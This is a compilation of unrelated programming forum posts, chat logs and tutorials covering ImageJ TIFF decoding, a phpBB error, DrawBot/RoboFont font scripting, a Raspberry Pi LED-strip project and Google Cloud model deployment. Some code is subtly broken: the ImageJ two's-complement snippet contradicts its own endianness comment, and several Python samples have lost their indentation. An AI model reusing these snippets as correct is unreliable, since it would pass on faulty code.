In a script, I am using IJ.openImage() to open a two-channel 16-bit signed single-slice TIF file that has been encoded with the two’s complement.
The LOCI bio-formats dialog opens, and all that is needed to do is push ‘OK’.
How can one prevent the dialog from opening in the first place?
Opening the file manually using the bio-formats API is possible. Here is one attempt at it, that works, but surely it could be simpler?
from loci.formats import ChannelSeparator
#from java.nio import ByteBuffer, ByteOrder
from fiji.scripting import Weaver
from ij.process import ShortProcessor
from ij import ImagePlus, ImageStack, CompositeImage
from jarray import zeros
# *** EDIT HERE ***
filepath = ...
# An embedded piece of java code to parse the raw bytes into signed 16-bit pixels, decoded with two's complement.
# If the two's complement wasn't needed, there would be no need for the Weaver: ByteBuffer would suffice.
arrays = [None, None]
asShorts = Weaver.inline(
"""
final byte[] bytes = (byte[])arrays.get(0);
final short[] shorts = (short[])arrays.get(1);
for (int i=0, k=0; i<shorts.length; i+=1, k+=2) {
// In little endian and with two's complement
// (parentheses needed: '&' binds more loosely than '<<' in Java)
shorts[i] = (short) (~((bytes[k+1]&0xff) | ((bytes[k]&0xff) << 8)) + 1);
}
return null;
""", {"arrays": arrays})
# A LOCI bio-formats decoder for the TIFF file
reader = ChannelSeparator()
reader.setGroupFiles(False)
reader.setId(filepath)
width = reader.getSizeX()
height = reader.getSizeY()
# Pre-allocated array for reuse in reading each image plane
bytes = zeros(width * height * 2, 'b')
stack = ImageStack(width, height)
# Read each of the two image planes, one for each channel
for i in xrange(reader.getImageCount()):
reader.openBytes(i, bytes)
shorts = zeros(width * height, 'h') # 'h' is for short (16-bit)
# Should work, but doesn't do the two's complement, which is needed because these TIFF files are signed 16-bit.
#ByteBuffer.wrap(bytes).order(ByteOrder.LITTLE_ENDIAN).asShortBuffer().get(shorts)
# So instead we do it manually with the Weaver:
arrays[0] = bytes
arrays[1] = shorts
asShorts.call()
stack.addSlice(ShortProcessor(reader.getSizeX(), reader.getSizeY(), shorts, None))
# Show the stack as an ImageJ composite image
imp = ImagePlus("all", stack)
imp.setDimensions(2, stack.getSize() / 2, 1) # channels, slices and time frames
comp = CompositeImage(imp, CompositeImage.COMPOSITE)
comp.show()
Surely there is a simpler way?
|
I am in need of some serious help. I recently tried to change the theme on my board, and it turns out I changed it to one where files were missing, so I couldn't use my board or UCP. After searching around here I managed to get that issue sorted by downloading new files and running the database_update.php routine, which worked great: my board is back up and running with all my images, posts and users in check.
However, to cause me further stress (as if my morning hasn't been bad enough already), I now cannot log in to my control panel, as I get this error:
Code:
Fatal error: Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (@UNIX_TIMESTAMP()) at position 0 (@): Unexpected character' in /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php:50 Stack trace: #0 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php(50): DateTime->__construct('@UNIX_TIMESTAMP...', Object(DateTimeZone)) #1 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/user.php(720): phpbb\datetime->__construct(Object(phpbb\user), '@UNIX_TIMESTAMP...', Object(DateTimeZone)) #2 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/includes/acp/acp_main.php(462): phpbb\user->format_date('UNIX_TIMESTAMP(...') #3 /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/includes/functions_module.php(674): acp_main->main('main', 'main') #4 /websites/123reg/LinuxPackage23/lf in /websites/123reg/LinuxPackage23/lf/sf/lo/lfsfloorings.co.uk/public_html/DOA360/forums/phpbb/datetime.php on line 50
If there is a superhero out there, please, I need you more than ever here; I am losing hair by the minute.
Thanks in advance to anyone who can help here.
|
Oval() point placement
ryan last edited by
Hi there,
I'm curious as to why the output from oval() has on-curves on angled extrema rather than traditional 0/90 extreme points. Sometimes I build patterns, export to PDF, and then work with them in Illustrator, but this point structure makes it more difficult. Screenshot in Illustrator below.
Thanks,
Ryan
gferreira last edited by
hello @ryan,
I don't know why the extremes are angled…
here's a way to get the desired result by modifying oval:
def twist(func, angle):
def wrapper(x, y, w, h):
with savedState():
translate(x + w/2, y + h/2)
rotate(angle)
func(-w/2, -h/2, w, h)
return wrapper
oval = twist(oval, 45)
when working with BezierPath, it's possible to rotate the shape:
B = BezierPath()
B.oval(x, y, w, h)
B.rotate(45, (x + w/2, y + h/2))
hope this helps!
I don't know why, but my wild guess is that it has to do with drawing ovals at more extreme w/h ratios: when the points are on the extremes you need a pushing point in the middle to curve back nicely.
@gferreira your method only works for circles...
the drawBot RoboFont extension has points on the extremes, because the context is type... see https://github.com/typemytype/drawBotRoboFontExtension/blob/master/DrawBot.roboFontExt/lib/glyphContext.py#L23
see the big difference when the oval is getting thinner...
def straightOval(x, y, w, h):
c = 0.55
hx = w * c * .5
hy = h * c * .5
path = BezierPath()
path.moveTo((x + w * .5, y))
path.curveTo((x + w * .5 + hx, y), (x + w, y + h * .5 - hy), (x + w, y + h * .5))
path.curveTo((x + w, y + h * .5 + hy), (x + w * .5 + hx, y + h), (x + w * .5, y + h))
path.curveTo((x + w * .5 - hx, y + h), (x, y + h * .5 + hy), (x, y + h * .5))
path.curveTo((x, y + h * .5 - hy), (x + w * .5 - hx, y), (x + w * .5, y))
path.closePath()
drawPath(path)
x, y, w, h = 10, 10, 8.0, 146.0
oval(x, y, w, h)
straightOval(x + w + 10, y, w, h)
|
Controlling an LED strip with a Raspberry Pi and Android
Hello, Habr regulars and guests.
I've been reading Habr for a long time, but never had a reason to write an article, until I was once again reminded of the existence of the Raspberry Pi and of such a thing as the WS2801 LED Strip. A similar one was already written about here, but paired with an Arduino to get Ambilight, so I decided to take the risk and write my own article, with Lego and cats.
The article will have few pictures, a few videos, a lot of text (including off-topic lyrical digressions) and very little code, but at the very end there will be links to the project on GitHub. Now, first things first.
It all started when I learned that a coworker regularly brings in Raspberry "Pies" and sells them with minimal markup, especially to colleagues. Hearing about the Pies once again, I couldn't resist and bought one from him. I won't explain what it is and what can be done with it; everyone already knows, and whoever doesn't can search, there are plenty of articles. I played with mine for a week or two, set it up for what I needed, and settled down.
But then the same colleague dropped an interesting tip: you can order a controllable (addressable) "garland" from eBay (plus a power supply, connectors and jumper wires to your taste) and get DIY Ambilight the simplest way, as described, for example, here. Or you can simply play with the garland however you like: in theory it allowed lighting any of the bulbs with any RGB color at any moment, and owning such a thing had been my dream for several years!
Without much thought, I ordered the necessary parts on eBay. The estimated delivery time was about three weeks, so meanwhile there was time to get distracted by preparations for a week's vacation in Sweden. After returning I had another week at home, trying to find in advance as much information as possible on how the garland would have to be connected, and looking for various scripts and libraries for writing my own control algorithms. Little of substance turned up: one Habr article, though about pairing with an Arduino, and a few links that led to this Python project. Since I had no plans for Ambilight anyway, and Python isn't dear to my heart (I love Java + Android myself), I didn't find much useful information there. I had free time, the garland still wasn't arriving, so I decided to knock together a simple Android app simulating the garland and write a couple of algorithms to control it. The app was so simple, and no less crooked, that I never even showed it to anyone.
On the last weekend of the vacation, the long-awaited Lego 42009 box arrived from Novosibirsk and temporarily eclipsed my thoughts of the garland.
The Lego build was scheduled for the following weekend, roughly when the parcel from China was also expected. I kept wondering which I was anticipating more: the ceremonial opening of the Lego box and the build of the current top Lego Technic set, or playing with the dream of the last several years. The parcel arrived on Friday evening, and the plan for Saturday morning was to start building the set and shooting a time-lapse of the process.
Naturally, I couldn't hold out on Friday evening and tried to hook the garland up to the Pie, but lacking the right jumper wires, connecting to the RPi's GPIO ports was difficult. Having dug up some old wires, taken apart an old mouse, and read my fill of articles on the Internet, I tried to connect the garland any way I could and run test scripts. All in vain. When power was applied to the garland, the first bulb lit up white and that was all; there was no reaction no matter what I ran on the Pie. Thoroughly worn out, I decided to put the matter off until morning.
In the morning a photographer friend came over to help build and shoot the Lego; together with him I again tried, without success, to connect the garland to the Pie. After an hour we dropped it and went to prepare the apartment environment for building the Mobile Crane.
[lyrical digression]
The build went off with a bang; the crane lived up to all expectations and turned out even bigger than I had thought, and the build process itself was challenging and engrossing. A time-lapse video of the build can be watched here.
[/lyrical digression]
Since we started later than planned, we finished even later and never got back to the garland. But the next afternoon another acquaintance arrived, a real hardware guy this time, bringing the much-needed jumper wires of various lengths and connectors for hooking the garland up to the Pie. We sat down to tinker and spent probably five hours, seemingly without success. At first the garland did not react at all to external stimuli, that is, to us. Then the first few lights sometimes started blinking when we touched the connectors going to the Pie. An hour later we figured out that if you short with your fingers the wires that should go to the Pie, the first few lights of the garland turn on or off. So it was working after all; it remained to understand why the scripts weren't. A quick look at the Python script showed it used the device
/dev/spidev0.0, which was in fact present on my system. In parallel I tried googling the problem, found things, applied whatever was suggested, but without success.
By the end of the day, completely out of strength, my guest left me, and while he was riding home I decided to wander into the Pie's config,
raspi-config,
and discover the main epic fail of the past couple of days, namely that SPI was disabled on my system…
I enabled it. The script worked: I could turn all the LEDs on and off in white and run two endless actions: fade (gradual appearance and fading in random colors) or chase (a light running in sequence from start to end).
My happiness knew no bounds. I even took a couple of photos of the finished Lego crane by the light of the garland:
The script's meager capabilities quickly grew boring, and writing something of my own in Python would have been quite a struggle for me. So the decision was made to write my own simple Java application for the Raspberry and to start "tomorrow". And "tomorrow" was a Monday. On that particular Monday I didn't want to go to work more than on any other Monday before it. Having survived Monday, escaped from work early, and hung the garland under the ceiling, along the top edge of the rug that hangs in my apartment covering a big hole in the wallpaper, I sat down to code, where one more catch awaited me, albeit an expected one.
Having installed all the necessary Java packages, I decided to write a Hello World, compile it and run it right on the Pie. Compiling even such a simple application on the Raspberry Pi took several seconds, around five; what would happen with the code to come? That was rather inconvenient, as was the absence of a proper IDE. So the decision was made to write the code on the big PC, upload the compiled classes to the Pie over FTP, and run them there. Later, when the project grew to a large number of files, I started building straight into jars. Now we get to the most interesting part. The main question stood: how to make the garland light up using Java. Googling gave nothing; there were C sources using libraries and a couple of Python scripts. In the latter it looked like this:
spidev = file("/dev/spidev0.0", "wb")
spidev.write(pixels)
time.sleep(refresh_rate/1000)
where
pixels is a byte array three times as large as the number of bulbs in the garland. Each group of three elements in the array holds the RGB channel values for one bulb. Say we have a garland of 50 bulbs; to light all of it, we write to /dev/spidev0.0 an array of the form {R0, G0, B0, R1, G1, B1, ... R49, G49, B49}. No headers, just the byte array and a flush afterwards.
The main idea is that at every moment in time you must write the whole array to the file, even if you only want to light a single bulb. The time delay is needed so that all the changes are visible on the strip; it can be varied as desired.
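For illustration, a minimal Python 3 sketch (assuming a 50-bulb WS2801 garland on /dev/spidev0.0, as in the article) that lights only the tenth bulb red and leaves the rest dark:
import time

NUM_LEDS = 50
pixels = bytearray(3 * NUM_LEDS)  # all channels 0 -> everything off
pixels[9 * 3 + 0] = 255           # R channel of bulb #9 (zero-based)

# The whole array is written every time, even for a single bulb.
with open("/dev/spidev0.0", "wb") as spidev:
    spidev.write(pixels)
    spidev.flush()
time.sleep(0.05)                  # give the strip time to latch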
Returning to Java, the file-writing code there looks almost the same (try-catch omitted):
FileOutputStream spidev = new FileOutputStream(new File("/dev/spidev0.0"));
spidev.write(bytes);
spidev.flush();
Thread.sleep(refreshRate); // refreshRate: the delay in ms, like refresh_rate in the Python script
Собственно, написав простенький класс работы с устройством, написал ещё пару классов-обёрток для различных простых действий, таких как зажечь определённую лампочку заданным цветом, зажечь всю гирлянду нужным цветом, тот же chase и fade. Днём позже прикрутил ещё визуализацию работы стека и чего-то ещё.
Но опять же, запускать эти «алгоритмы» — мало интереса и это тоже быстро надоело. Хотелось непосредственного управления. Было решено написать простенький сервер, опять же на Джаве, который принимал бы строковые данные, парсил их и взаимодействовал с гирляндой на основе присланных «команд». Для удобства было сделано так, что порт, количество лампочек в гирлянде и устройство (
/dev/spidev0.0) задавались с помощью параметров при запуске сервера.
Клиент, в сою очередь, на Андроиде. В первой версии клиента был минимальный функционал — включить-выключить, установить цвет с помощью RGB-ползунков и «двигать» огонёк ещё одним ползунком. Не смотря на мою нелюбовь «с детства» к клиент-серверному коду, написанный код работал и даже правильно.
I quickly realized that 50 bulbs would not be enough and ordered 50 more, counting on folding them later into a 10x10 square, which opens a whole new field for imagination; there you could even build a classic Snake.
A bit later a student I know helped rewrite the client-server code into a more proper architecture: the client now talked to the server using a predefined set of commands, and the data for each command was a parameter of type Object, so it could hold anything at all. Also, to guard against "unauthorized access", I added a password field on the server, and the client sent the password as its first command. If it didn't match, the server disconnected the client. This was in case someone who knew the hostname/IP and port of my Pi tried to play with the garland.
Having reworked the code for the new architecture, I started growing the functionality outward, adding new UI elements and new bulb-control algorithms.
Flickering in RGB and random colors appeared, as did a rainbow, including a moving one. I even wired up NFC to toggle the lights when any tag was read (removed from the final version). Worth mentioning separately: I hooked up Google's SpeechRecognizer, tuned to understand literally five commands: "red", "green", "blue", "yellow", and "rainbow". And the most interesting feature, in my view, is using the garland's whole length as an... equalizer; more precisely, the number of consecutively lit bulbs depended on the loudness of the sound picked up by the smartphone's microphone. It looks especially effective with the track
Caspa — Sir Rock A Lot:
A general overview of the app's functionality:
After that I played around with a couple more algorithms, fixed bugs I found on the server and the client, and did some light refactoring. The main control screen now looks like this:
All the code is published on GitHub (the library, the server, and the client) for anyone interested. I'll be glad if it helps someone. I'm planning to fork it into version 2.0; I haven't fully decided on its functionality yet, but roughly I plan the following:
Choice of control screen: a straight strand, a rectangle, or a square.
Extending the current functionality for a strand stretched into one straight line.
Writing a batch of algorithms for the strand folded into a square or rectangle:
Controlling a single lit bulb
An equalizer radiating from the center of the square
Static text / a ticker line
Snake
and something else. If you have ideas, write in; I'll gladly discuss them and take them into account.
A few small things I forgot to mention at the right time:
1. You may need to correct each LED's color before writing to the file, because the light comes out "cold" and shifts toward blue at 255-255-255. The Python script I found does exactly that:
def correct_pixel_brightness(pixel):
    corrected_pixel = bytearray(3)
    corrected_pixel[0] = int(pixel[0] / 1.1)   # damp red slightly
    corrected_pixel[1] = int(pixel[1] / 1.1)   # damp green slightly
    corrected_pixel[2] = int(pixel[2] / 1.3)   # damp blue more, to remove the cold cast
    return corrected_pixel
2. The icon was drawn for me by the same person who helped record the time-lapse of the Lego build. It's based on a photo of my cat.
3. The described operations with the file /dev/spidev0.0 only work for strips with the WS2801 controller. Last weekend we gave a friend (necrys) a birthday present that was specifically a strip rather than a garland (this time actually for Ambilight), very much hoping it would also be WS2801. There was no time to order from China, so we bought locally; the seller claimed the controller was the same, although there were no markings on the package or the strip itself. In the middle of the birthday celebration we decided to try hooking it up. After several fruitless hours, and we thought we knew all the pitfalls, we still couldn't get it to light up, until we accidentally tried switching the protocol to SM16716, after which the strip lit up and even chase worked, but it refused to go dark. Writing a simple C program didn't solve it: writing 3-byte-per-pixel arrays lit up such odd segments of the strip that we couldn't understand its logic that day. After more experiments, by the middle of the next day the strip's new owner finally worked out how to drive it: you have to write 4 bytes per lit pixel, where the first byte must always be 0xFF and the rest are RGB. Changing the first byte's value produces behavior whose meaning we still can't figure out. Precisely because of the controller difference, building and patching boblight so it would work correctly with the strip, and hooking it up to xbmc, took several days. But afterwards the result was achieved:
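A minimal sketch of that 4-bytes-per-pixel framing, as I understand the description above (the device path and bulb count are assumptions on my part):

NUM_BULBS = 50

def build_sm16716_frame(colors):
    # Each lit pixel is 0xFF followed by its R, G, B bytes.
    frame = bytearray()
    for r, g, b in colors:
        frame += bytes((0xFF, r, g, b))
    return frame

with open("/dev/spidev0.0", "wb") as dev:
    dev.write(build_sm16716_frame([(0, 255, 0)] * NUM_BULBS))  # all bulbs green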
Please don't be too hard on the code; unfortunately I have no experience writing large projects yet, and when I started writing it I didn't expect it to grow this big. This is also my first experience with Git and with publishing my own code as open source.
Thanks, I hope it was interesting.
|
April 10, 2020 — Posted by Sara Robinson, Developer Advocate
Google Cloud’s AI Platform recently added support for deploying TensorFlow 2 models. This lets you scalably serve predictions to end users without having to manage your own infrastructure. In this post, I’ll walk you through the process of deploying two different types of TF2 models to AI Platform and use them to generate predictions with the AI Platfo…
We'll deploy the probability_model created at the end of this notebook, since it outputs classifications in a more human-readable format. The output of probability_model is a 10-element softmax array with the probabilities that the given image belongs to each class. Since it's a softmax array, all of the elements add up to 1. The highest-confidence classification will be the item of clothing corresponding with the index with the highest value.
from google.colab import auth
auth.authenticate_user()
Then run the following, replacing “your-project-id-here” with the ID of the Cloud project you created:
CLOUD_PROJECT = 'your-project-id-here'
BUCKET = 'gs://' + CLOUD_PROJECT + '-tf2-models'
For the next few code snippets, we'll be using gcloud, the Google Cloud CLI, along with gsutil, the CLI for interacting with Google Cloud Storage. Run the line below to configure gcloud with the project you created:
!gcloud config set project $CLOUD_PROJECT
In the next step, we'll create a Cloud Storage bucket and print our GCS bucket URL. This will be used to store your saved model. You only need to run this cell once:
!gsutil mb $BUCKET
print(BUCKET)
Cloud AI Platform expects our model in TensorFlow 2 SavedModel format. To export our model in this format to the bucket we just created, we can run the following command. The
model.save() method accepts a GCS bucket URL. We’ll save our model assets into a fashion-mnist subdirectory:
probability_model.save(BUCKET + '/fashion-mnist', save_format='tf')
To verify that this exported to your storage bucket correctly, navigate to your bucket in the Cloud Console (visit Storage -> Browser) and check that the fashion-mnist subdirectory contains the saved model files.
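You can also list the exported files directly from the notebook as a quick sanity check (a suggestion of mine, not from the post; this uses TensorFlow's GCS-aware file API, and the exact directory contents may vary by TF version):

import tensorflow as tf
# Expect saved_model.pb plus the variables/ and assets/ directories.
print(tf.io.gfile.listdir(BUCKET + '/fashion-mnist'))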
Next, create a model resource in AI Platform for the versions you'll deploy:
MODEL = 'fashion_mnist'
!gcloud ai-platform models create $MODEL --regions=us-central1
Once this runs, you should see the model in the Models section of the AI Platform Cloud Console.
Next, set a version name and point to the directory where you saved the model:
VERSION = 'v1'
MODEL_DIR = BUCKET + '/fashion-mnist'
Finally, run this gcloud command to deploy the model:
!gcloud ai-platform versions create $VERSION \
--model $MODEL \
--origin $MODEL_DIR \
--runtime-version=2.1 \
--framework='tensorflow' \
--python-version=3.7
This command may take a minute to complete. When your model version is ready, it will be listed under the model in the Cloud Console.
import googleapiclient.discovery

def predict_json(project, model, instances, version=None):
    service = googleapiclient.discovery.build('ml', 'v1')
    name = 'projects/{}/models/{}'.format(project, model)
    if version is not None:
        name += '/versions/{}'.format(version)
    response = service.projects().predict(
        name=name,
        body={'instances': instances}
    ).execute()
    if 'error' in response:
        raise RuntimeError(response['error'])
    return response['predictions']
test_predictions = predict_json(CLOUD_PROJECT, MODEL, test_images[:2].tolist())
In the response, you should see a JSON object with softmax as the key, and a 10-element
softmax probability list as the value. We can get the predicted class of the first test image by running:
np.argmax(test_predictions[0]['softmax'])
Our model predicts class 9 for this image with 98% confidence. If we look at the beginning of the notebook, we’ll see that 9 corresponds with ankle boot. Let’s plot the image to verify our model predicted correctly. Looks good!
plt.figure()
plt.imshow(test_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
The model expects its inputs keyed by the same names as our feature_columns. This is the input format our model is expecting, and it will come in handy after we deploy it. In addition to sending features as tensors, we can also send them to our deployed model as lists. Note that this model has a mix of numerical and categorical features. One of the categorical features (thal) should be passed in as a string; the rest are either integers or floats. As before, we'll save our model assets, this time into an hd-prediction subdirectory:
model.save(BUCKET + '/hd-prediction', save_format='tf')
Verify that the model assets were uploaded to your bucket. Since we showed how to deploy models with gcloud in the previous section, here we'll use the Cloud Console.
Head over to the Models section of your Cloud Console, select the New model button, give your model a name like hd_prediction, and select Create.
Once your model resource has been created, select
New version. Give it a name (like v1), then select the most recent Python version (3.7 at the time of this writing). Under frameworks select TensorFlow with Framework version 2.1 and ML runtime version 2.1. In Model URL, enter the Cloud Storage URL where you uploaded your TF SavedModel earlier. This should be equivalent to BUCKET + '/hd-prediction' if you followed the steps above. Then select Save, and when your model is finished deploying you’ll see a green checkmark next to the version name in your console.
# First remove the label column
test.pop('target')

caip_instances = []
test_vals = test[:2].values

for i in test_vals:
    example_dict = {k: [v] for k, v in zip(test.columns, i)}
    caip_instances.append(example_dict)
Here’s what the resulting array of
caip_instances looks like:
[{'age': [60],
'ca': [2],
'chol': [293],
'cp': [4],
'exang': [0],
'fbs': [0],
'oldpeak': [1.2],
'restecg': [2],
'sex': [1],
'slope': [2],
'thal': ['reversible'],
'thalach': [170],
'trestbps': [140]},
...]
We can now call the same
predict_json method we defined above, passing it our new model and test instances:
test_predictions = predict_json(CLOUD_PROJECT, 'hd_prediction', caip_instances)
The response will look something like this:
[{'output_1': [-1.4717596769332886]}, {'output_1': [-0.2714746594429016]}]
Note that if you’d like to change the name of the output tensor (currently
output_1), you can add a name parameter when you define your Keras model in the tutorial above:
layers.Dense(1, name='prediction_probability')
In addition to making predictions with the API, you can also make prediction requests with gcloud. All of the prediction requests we’ve made so far have used online prediction, but AI Platform also supports batch prediction for large offline jobs. To create a batch prediction job, you can make a JSON file of your test instances and kick off the job with gcloud. You can read more about batch prediction here.
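As a rough illustration (mine, not from the post), submitting a batch prediction job with gcloud might look like the following; the job name, paths, and region are placeholders, so check the gcloud reference for the exact flags:

!gcloud ai-platform jobs submit prediction my_batch_job \
  --model $MODEL \
  --input-paths 'gs://your-bucket/batch-inputs/*' \
  --output-path 'gs://your-bucket/batch-outputs' \
  --region us-central1 \
  --data-format text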
|
RFont subclass not generating "otf"
RicardGarcia last edited by gferreira
Hello,
I'm working on a set of animations that are going to use some .ufos I have, and I'm facing a problem that I don't know how to solve. The point is that I want to generate otf files out of them using generate on the Font object, but it says 'The RFont subclass does not implement this method.' Any idea what I'm doing wrong?
Here's a simplified version of the code that returns this error:
from fontParts.world import NewFont, OpenFont
ufos = ['Patufet-Black.ufo', 'Patufet-Light.ufo']
new_f = OpenFont(ufos[0], showInterface=False)
print(new_f)
new_f.generate("otfcff", "_Install-otf/new_f.otf")
Thanks.
Inside the app DrawBot, an RFont has no implementation for the method generate.
Inside RoboFont you can use the DrawBot extension, where you have all the powers DrawBot has to draw and all the powers RoboFont has to edit font data, and you can also call font.generate(...).
RicardGarcia last edited by RicardGarcia
I see. Then, if I want to make an animation with a long text interpolating between two .ufo files, what would be the best option? Generating a .designspace with an axis, exporting the .otf, and using it in the script?
From what you say, it looks doable inside RoboFont itself, though.
Thanks!
gferreira last edited by
hello @RicardGarcia,
for a simple interpolation between two masters you can use font.interpolate(factor, font1, font2); see this example script.
hope this helps!
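For reference, a minimal sketch of that call (my example, assuming two UFOs are open in RoboFont and fontParts is available):

from fontParts.world import AllFonts, NewFont
f1, f2 = AllFonts()[0], AllFonts()[1]
new_f = NewFont(showInterface=False)
new_f.interpolate(0.5, f1, f2)   # factor 0.5 = halfway between the two masters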
there are several options:
font.interpolate will return a ufo
a designspace document with a given location will also return a ufo; use mutatorMath
generate a variable font
Generating variable fonts from design spaces is not difficult: in RoboFont you can use the Batch extension. In DrawBot you can pip install
ufo2ft to generate a var font and use it inside your type setting.
good luck!
RicardGarcia last edited by
Thank you so much for your help to both of you. @gferreira, the example you linked is super helpful and clear. I've read a bunch of code samples on RoboFont's website and I don't know why I didn't run into this one. @frederik, thanks! I think that the main thing I was doing wrong was doing it outside RoboFont. With the hints you both gave me I can manage to do what I wanted inside RoboFont.
Thanks!
RicardGarcia last edited by RicardGarcia
Hi again. Even though both of your comments helped me a lot, I'm still facing one last problem that I don't know how to solve.
From my opened ufos, I'm generating a new interpolated font that I'm using in each frame to make an animation. The point is that if I write the factor right away, like 0, .25 or 1, it does the correct interpolation, but it doesn't if I use the variable interp_factor. Is it something about overwriting the new_f.otf file?
I've tried to clean up the code as much as possible and hope that helps others point out what's going on here:
text2Use = """
A monospaced font, also called a fixed-pitch, fixed-width, or non-proportional font, is a font whose letters and characters each occupy the same amount of horizontal space.
"""

def animationInstagram(text = text2Use):
    # Size of the page in px
    w, h = 1200, 2134.4
    # Number of frames
    frames = 4
    # Step factor
    maxFactor = 1
    stepFactor = maxFactor / (frames)
    # Interpolation factor (starting point)
    interp_factor = 1
    # Accessing opened ufos
    f1, f2 = AllFonts()[0], AllFonts()[1]
    f1.generate("otfcff", "f1.otf")
    f_1 = OpenFont("f1.otf", showInterface=False)
    f2.generate("otfcff", "f2.otf")
    f_2 = OpenFont("f2.otf", showInterface=False)
    # Frames
    for f in range(frames):
        # Page settings
        newPage( w , h )
        fill(0) # BG
        rect(0, 0, w, h)
        fill(1) # FG
        # Creating font to interpolate
        new_f = NewFont(showInterface=False)
        new_f.interpolate(interp_factor, f_1, f_2, round=False)
        print("Interpolation factor: ", interp_factor)
        new_f.generate("otfcff", "new_f.otf")
        # Installing the interpolated (temporary) font
        fontName = installFont("new_f.otf")
        # ------------------
        # Text box
        extraSpace = -200
        boxX, boxY, boxW, boxH = extraSpace, extraSpace, w-extraSpace*2.7, h-extraSpace*2
        font(fontName, 100)
        textBox(text, (boxX, boxY, boxW, boxH), align="left")
        # ------------------
        # Subtracting step factor
        interp_factor -= stepFactor
        # Uninstalling
        uninstallFont("new_f.otf")

# Calling the function
animationInstagram()
# Saving the image
saveImage("Test-interpolation.gif")
Thank you so much once again!
two things:
why generate a binary and read the binary back in? see
f1.generate("otfcff", "f1.otf")
Give your new font a unique name based on the interp_factor. The font familyName and styleName make up the postScriptName, which has to be unique to set a font in DrawBot (and everywhere else). In your case the font familyName and styleName will be "None" "None". This is not good...
RicardGarcia last edited by
Hi, @frederik:
why generate a binary and read the binary back in? see f1.generate("otfcff", "f1.otf")
You mean I can use the opened ufo files right away as f1 and f2 to interpolate with, right?
Give your new font a unique name based on the interp_factor. The font familyName and styleName make up the postScriptName, which has to be unique to set a font in DrawBot (and everywhere else). In your case the font familyName and styleName will be "None" "None". This is not good...
All right. I thought that after uninstalling the interpolated font I could generate another one to use in the new page afterwards. So, in this case, would it make sense to set the same familyName while the styleName could be related to interp_factor, as you say?
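For what it's worth, a minimal sketch of that naming scheme (my own illustration; the family name is a placeholder):

new_f.info.familyName = "PatufetInterp"
new_f.info.styleName = "w%03d" % round(interp_factor * 100)   # e.g. "w025" for factor 0.25

This makes the postScriptName unique per frame, so each installed font is distinct.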
|
@Botenga delete this code you have at the end of your html:
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" type="text/css" href="bootstrap.css">
</body>
and it should work now
use https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js, not https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1 (the URL without the jquery.min.js part)
botenga sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
html-joe sends brownie points to @sorinr :sparkles: :thumbsup: :sparkles:
var img = document.createElement('img')
img.src = stringified.weather[0].icon
hoxtygen sends brownie points to @mot01 :sparkles: :thumbsup: :sparkles:
document.getElementById('image-container').innerHTML = "<img src = "+stringified.weather[0].icon+">";
hoxtygen sends brownie points to @sorinr and @mot01 :sparkles: :thumbsup: :sparkles:
await try{this.getStreamData()}.catch(error){console.log(error)}; didn't work out when I made getStreamData async. Here's my pen:
primuscovenant sends brownie points to @heroiczero :sparkles: :thumbsup: :sparkles:
catherinewoodward sends brownie points to @terensu-desu :sparkles: :thumbsup: :sparkles:
Pens on CodePen don't need <html> or <body> sections in them - that is provided by the template. For animate.css you can paste it into the resource boxes directly, or they have "quick adds" and a way to search for the package that you want. CodePen is a nice useful site - just remember to stick with "Pen" items for your pages; as a free user (unless you've paid) you only have one "Project". I don't think that there is a limit to the number of "Pen" items? I have seen people get confused by the fact that they can only have one "project"... maybe it will be helpful to be aware of that.
@terensu-desu Sure!
<html>
<head>
<script type="text/javascript" src="https://safi.me.uk/typewriterjs/js/typewriter.js"></script>
<script>
var app = document.getElementById('app');
var typewriter = new Typewriter(app, {
loop: true
});
typewriter.typeString('Hello World!')
.pauseFor(2500)
.deleteAll()
.typeString('Strings can be removed')
.pauseFor(2500)
.deleteChars(7)
.typeString('altered!')
.start();
</script>
</head>
<body>
<div id="app"></div>
</body>
</html>
This is my code currently. Nothing shows when I run it. Just a blank page!
indikoro sends brownie points to @khaduch :sparkles: :thumbsup: :sparkles:
Move the <script> element to the end, just before the </body> closing tag. That will ensure that the page is loaded before it tries to run the JS (or wrap the code in $(document).ready()).
hi, can someone tell me how to fix this issue?
I have set up a fixed navbar, but the banner goes below the navbar.
How do I get the banner to show up after the navbar?
sorry reycuban, you can't send brownie points to yourself! :sparkles: :sparkles:
reycuban sends brownie points to @tiagocorreiaalmeida :sparkles: :thumbsup: :sparkles:
it's not actually an error. When I post data and get it back, it works fine, but whenever I reload the page, the data the server returned and displayed in the browser is gone. Why? Additional info:
Robomongo is not supported on my system, so I can't see whether the data is stored or not.
My system is a 32-bit OS.
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
const express = require('express');
const router = require('./api/router.js');
const bodyParser = require('body-parser');
const mongoose = require('mongoose');
const app = express();
mongoose.connect("mongodb://localhost/gomaxi");
mongoose.Promise = global.Promise;
app.use(express.static('public'));
app.use(bodyParser.json());
app.use(router);
app.listen(4000,function(){
console.log("server is listening for the request on port 4000 , hurray !");
});
router.get('/api/maxi',function(req,res){
console.log('1');
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log('2')
cricketModel.create(req.body).then(function(data){
res.send(data);
console.log(data);
